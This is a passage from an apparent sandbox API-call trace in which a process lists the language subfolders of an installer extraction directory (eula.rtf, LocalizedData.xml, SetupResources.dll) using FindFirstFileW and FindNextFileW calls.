ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.822] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.824] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.824] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.824] FindClose (in: hFindFile=0x4260788 | out: hFindFile=0x4260788) returned 1 [0045.825] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.825] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0045.825] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.825] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260388 [0045.826] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.826] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.826] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.826] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.826] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.827] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0045.827] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.827] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0045.827] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.827] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260608 [0045.828] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.828] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.828] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.828] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.829] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.831] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0045.831] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.831] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0045.831] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.831] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260108 [0045.831] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.831] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.831] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.831] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.831] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.831] FindClose (in: hFindFile=0x4260108 | out: hFindFile=0x4260108) returned 1 [0045.832] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.832] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0045.832] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.832] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42605c8 [0045.833] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.833] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.833] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.833] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.833] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.834] FindClose (in: hFindFile=0x42605c8 | out: hFindFile=0x42605c8) returned 1 [0045.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.834] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0045.834] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.834] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260808 [0045.835] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.835] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.835] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.836] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.836] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.837] FindClose (in: hFindFile=0x4260808 | out: hFindFile=0x4260808) returned 1 [0045.837] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.837] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0045.837] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.837] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42603c8 [0045.838] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.838] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.839] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.839] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, 